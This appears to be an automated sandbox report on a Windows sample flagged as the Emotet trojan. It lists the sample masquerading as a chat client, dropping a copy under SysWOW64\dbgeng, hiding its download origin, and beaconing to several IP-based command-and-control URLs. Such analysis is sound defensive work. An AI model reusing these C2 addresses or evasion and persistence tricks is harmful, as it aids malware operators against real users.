Source: Yara match	File source: 10.2.Windows.System.Profile.RetailInfo.exe.77053f.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.296805928.0000000000C21000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.296561787.0000000000670000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.511924593.0000000000781000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.511863811.0000000000770000.00000040.00000001.sdmp, type: MEMORY

Source: 8U5snojV8p.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: C:\Users\user\Desktop\8U5snojV8p.exe

File deleted: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe:Zone.Identifier

Jump to behavior

Source: C:\Users\user\Desktop\8U5snojV8p.exe

File created: C:\Windows\SysWOW64\dbgeng\

Jump to behavior

Source: C:\Users\user\Desktop\8U5snojV8p.exe	Code function: 0_2_00401370		0_2_00401370
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Code function: 10_2_00401370		10_2_00401370

Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Code function: String function: 004269E6 appears 230 times
Source: C:\Users\user\Desktop\8U5snojV8p.exe	Code function: String function: 004269E6 appears 230 times

Source: 8U5snojV8p.exe, 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameChat Client.EXE vs 8U5snojV8p.exe
Source: 8U5snojV8p.exe	Binary or memory string: OriginalFilenameChat Client.EXE vs 8U5snojV8p.exe

Source: 8U5snojV8p.exe	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 8U5snojV8p.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8U5snojV8p.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8U5snojV8p.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8U5snojV8p.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8U5snojV8p.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll			Jump to behavior

Source: 8U5snojV8p.exe	Metadefender: Detection: 60%
Source: 8U5snojV8p.exe	ReversingLabs: Detection: 77%

Source: 8U5snojV8p.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\8U5snojV8p.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\8U5snojV8p.exe 'C:\Users\user\Desktop\8U5snojV8p.exe'
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: C:\Users\user\Desktop\8U5snojV8p.exe	Process created: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\8U5snojV8p.exe	Process created: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable	Jump to behavior

Source: C:\Users\user\Desktop\8U5snojV8p.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal96.troj.evad.winEXE@16/5@0/69

Source: C:\Users\user\Desktop\8U5snojV8p.exe

Code function: 0_2_0041F987 CoCreateInstance,

0_2_0041F987

Source: C:\Users\user\Desktop\8U5snojV8p.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe

Code function: 10_2_00783501 CreateToolhelp32Snapshot,Process32FirstW,FindCloseChangeNotification,

10_2_00783501

Source: C:\Windows\System32\conhost.exe

Mutant created: \BaseNamedObjects\Local\SM0:2076:120:WilError_01

Source: C:\Users\user\Desktop\8U5snojV8p.exe

Code function: 0_2_00420930 _EH_prolog,#1168,FindResourceA,LoadResource,SizeofResource,LockResource,ExtCreateRegion,#1641,#2452,SetWindowRgn,#2414,

0_2_00420930

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: 8U5snojV8p.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: C:\Users\User\Desktop\VC 6.0\21.7.20\chatwithusdi_src\Chat Client\Release\Chat Client.pdb source: 8U5snojV8p.exe

Source: C:\Users\user\Desktop\8U5snojV8p.exe	Code function: 0_2_004269B0 push eax; ret	0_2_004269DE
Source: C:\Users\user\Desktop\8U5snojV8p.exe	Code function: 0_2_0067834C push esi; iretd	0_2_00678354
Source: C:\Users\user\Desktop\8U5snojV8p.exe	Code function: 0_2_0067862D push eax; ret	0_2_00678649
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Code function: 10_2_004269B0 push eax; ret	10_2_004269DE
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Code function: 10_2_0077834C push esi; iretd	10_2_00778354
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Code function: 10_2_0077862D push eax; ret	10_2_00778649
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Code function: 10_2_00777E3C push eax; ret	10_2_00777E69

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Users\user\Desktop\8U5snojV8p.exe

Executable created and started: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe

Jump to behavior

Source: C:\Users\user\Desktop\8U5snojV8p.exe

PE file moved: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\8U5snojV8p.exe

File opened: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\8U5snojV8p.exe	Code function: 0_2_004012F3 _EH_prolog,OpenFileMappingA,#800,MapViewOfFile,#521,#567,#1651,GetLastActivePopup,#2864,IsIconic,#6215,SetForegroundWindow,#2463,#818,UnmapViewOfFile,CloseHandle,#6307,CloseHandle,		0_2_004012F3
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Code function: 10_2_004012F3 _EH_prolog,OpenFileMappingA,#800,MapViewOfFile,#521,#567,#1651,GetLastActivePopup,#2864,IsIconic,#6215,SetForegroundWindow,#2463,#818,UnmapViewOfFile,CloseHandle,#6307,CloseHandle,		10_2_004012F3

Source: C:\Users\user\Desktop\8U5snojV8p.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\8U5snojV8p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8U5snojV8p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8U5snojV8p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8U5snojV8p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8U5snojV8p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\svchost.exe TID: 6684

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe

Code function: 10_2_007828A3 FindFirstFileW,FindNextFileW,FindClose,

10_2_007828A3

Source: C:\Users\user\Desktop\8U5snojV8p.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: svchost.exe, 00000004.00000002.513647631.00000196D6C5F000.00000004.00000001.sdmp	Binary or memory string: $@Hyper-V RAW
Source: Windows.System.Profile.RetailInfo.exe, 0000000A.00000002.512060995.000000000079A000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW3
Source: svchost.exe, 00000004.00000002.513593270.00000196D6C47000.00000004.00000001.sdmp, Windows.System.Profile.RetailInfo.exe, 0000000A.00000002.513892428.0000000002672000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000005.00000002.511644682.000002B42C002000.00000004.00000001.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: svchost.exe, 00000004.00000002.511712314.00000196D1629000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW@Q
Source: svchost.exe, 00000005.00000002.511838410.000002B42C03E000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.512377920.000001792586A000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.512136478.000001D969029000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\8U5snojV8p.exe	Code function: 0_2_00670467 mov eax, dword ptr fs:[00000030h]	0_2_00670467
Source: C:\Users\user\Desktop\8U5snojV8p.exe	Code function: 0_2_00672674 mov eax, dword ptr fs:[00000030h]	0_2_00672674
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Code function: 10_2_00770467 mov eax, dword ptr fs:[00000030h]	10_2_00770467
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Code function: 10_2_00772674 mov eax, dword ptr fs:[00000030h]	10_2_00772674
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Code function: 10_2_00772F59 mov eax, dword ptr fs:[00000030h]	10_2_00772F59
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Code function: 10_2_0078361A mov eax, dword ptr fs:[00000030h]	10_2_0078361A
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Code function: 10_2_00782D35 mov eax, dword ptr fs:[00000030h]	10_2_00782D35

Source: Windows.System.Profile.RetailInfo.exe, 0000000A.00000002.513193361.0000000000EF0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: Windows.System.Profile.RetailInfo.exe, 0000000A.00000002.513193361.0000000000EF0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: Windows.System.Profile.RetailInfo.exe, 0000000A.00000002.513193361.0000000000EF0000.00000002.00020000.sdmp	Binary or memory string: SProgram Managerl
Source: Windows.System.Profile.RetailInfo.exe, 0000000A.00000002.513193361.0000000000EF0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd,
Source: Windows.System.Profile.RetailInfo.exe, 0000000A.00000002.513193361.0000000000EF0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\8U5snojV8p.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\8U5snojV8p.exe

Code function: 0_2_00401A91 GetVersion,malloc,GetVersionExA,malloc,GetVersionExA,free,

0_2_00401A91

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)

Show sources

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Source: svchost.exe, 0000000B.00000002.511726753.000001DFFA640000.00000004.00000001.sdmp	Binary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000B.00000002.511862494.000001DFFA702000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 0.2.8U5snojV8p.exe.67053f.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8U5snojV8p.exe.67053f.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Windows.System.Profile.RetailInfo.exe.77053f.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Windows.System.Profile.RetailInfo.exe.77053f.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.296805928.0000000000C21000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.296561787.0000000000670000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.511924593.0000000000781000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.511863811.0000000000770000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	DLL Side-Loading1	Process Injection2	Masquerading12	Input Capture21	Query Registry1	Remote Services	Input Capture21	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Disable or Modify Tools1	LSASS Memory	Security Software Discovery31	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion2	Security Account Manager	Virtualization/Sandbox Evasion2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection2	NTDS	Process Discovery3	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol111	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Hidden Files and Directories1	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information2	DCSync	File and Directory Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing1	Proc Filesystem	System Information Discovery24	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	DLL Side-Loading1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	File Deletion1	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
8U5snojV8p.exe	63%	Metadefender		Browse
8U5snojV8p.exe	78%	ReversingLabs	Win32.Trojan.Emotet
8U5snojV8p.exe	100%	Avira	HEUR/AGEN.1136733

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.8U5snojV8p.exe.67053f.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.Windows.System.Profile.RetailInfo.exe.77053f.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.0.8U5snojV8p.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen2	Download File
0.2.8U5snojV8p.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen2	Download File
10.2.Windows.System.Profile.RetailInfo.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen2	Download File
10.0.Windows.System.Profile.RetailInfo.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen2	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://schemas.m	0%	URL Reputation	safe
http://162.241.92.219:8080/YfyuG6sm3RqTIqU9gu/RiTaftnIbMGtd/UGb4JhQL57NsD/	0%	Avira URL Cloud	safe
http://79.98.24.39:8080/nqlXn6guO3P/JonayaNzsDdZJrNKjQ/x	0%	Avira URL Cloud	safe
http://162.241.92.219:8080/YfyuG6sm3RqTIqU9gu/RiTaftnIbMGtd/UGb4JhQL57NsD/J=c	0%	Avira URL Cloud	safe
http://79.98.24.39/nqlXn6guO3P/JonayaNzsDdZJrNKjQ/	0%	Avira URL Cloud	safe
http://91.231.166.124:8080/pvpiKpofI5CEEveCsq/H	0%	Avira URL Cloud	safe
http://94.49.254.194/vHzRXBVyW/b13Sx2TCD/	0%	Avira URL Cloud	safe
http://91.231.166.124:8080/pvpiKpofI5CEEveCsq/	0%	Avira URL Cloud	safe
http://94.49.254.194/vHzRXBVyW/b13Sx2TCD/n	0%	Avira URL Cloud	safe
http://91.231.166.124:8080/pvpiKpofI5CEEveCsq/G	0%	Avira URL Cloud	safe
https://activity.windows.comds	0%	Avira URL Cloud	safe
http://91.231.166.124/pvpiKpofI5CEEveCsq/	0%	Avira URL Cloud	safe
http://94.49.254.194/vHzRXBVyW/bm	0%	Avira URL Cloud	safe
http://79.98.24.39:8080/nqlXn6guO3P/JonayaNzsDdZJrNKjQ/E	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.	0%	Avira URL Cloud	safe
http://94.49.254.194d	0%	Avira URL Cloud	safe
http://79.98.24.39:8080/nqlXn6guO3P/JonayaNzsDdZJrNKjQ/0	0%	Avira URL Cloud	safe
http://79.98.24.39:8080/nqlXn6guO3P/JonayaNzsDdZJrNKjQ/	0%	Avira URL Cloud	safe
http://crl.ver)	0%	Avira URL Cloud	safe
http://79.98.24.39:8080/nqlXn6guO3P/JonayaNzsDdZJrNKjQ/04u%04u%04u%03u	0%	Avira URL Cloud	safe
http://94.49.254.194	0%	Avira URL Cloud	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
http://212.51.142.238:8080/8eo0xZCOyvK/VXdfxUvyon7i/R	100%	Avira URL Cloud	malware
http://79.98.24.39:8080/nqlXn6guO3P/JonayaNzsDdZJrNKjQ/#	0%	Avira URL Cloud	safe
https://dynamic.t	0%	URL Reputation	safe
http://212.51.142.238:8080/8eo0xZCOyvK/VXdfxUvyon7i/	100%	Avira URL Cloud	malware
http://212.51.142.238:8080/8eo0xZCOyvK/VXdfxUvyon7i/0	100%	Avira URL Cloud	malware
http://162.241.92.219:080/nqlXn6guO3P/JonayaNzsDdZJrNKjQ/	0%	Avira URL Cloud	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://162.241.92.219:8080/YfyuG6sm3RqTIqU9gu/RiTaftnIbMGtd/UGb4JhQL57NsD/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.m	svchost.exe, 00000004.00000002.512164511.00000196D16B2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://dev.ditu.live.com/REST/v1/Routes/	svchost.exe, 00000008.00000002.322101318.000001842483D000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 00000008.00000003.313319464.0000018424860000.00000004.00000001.sdmp	false		high
http://79.98.24.39:8080/nqlXn6guO3P/JonayaNzsDdZJrNKjQ/x	Windows.System.Profile.RetailInfo.exe, 0000000A.00000002.513847532.00000000025F4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
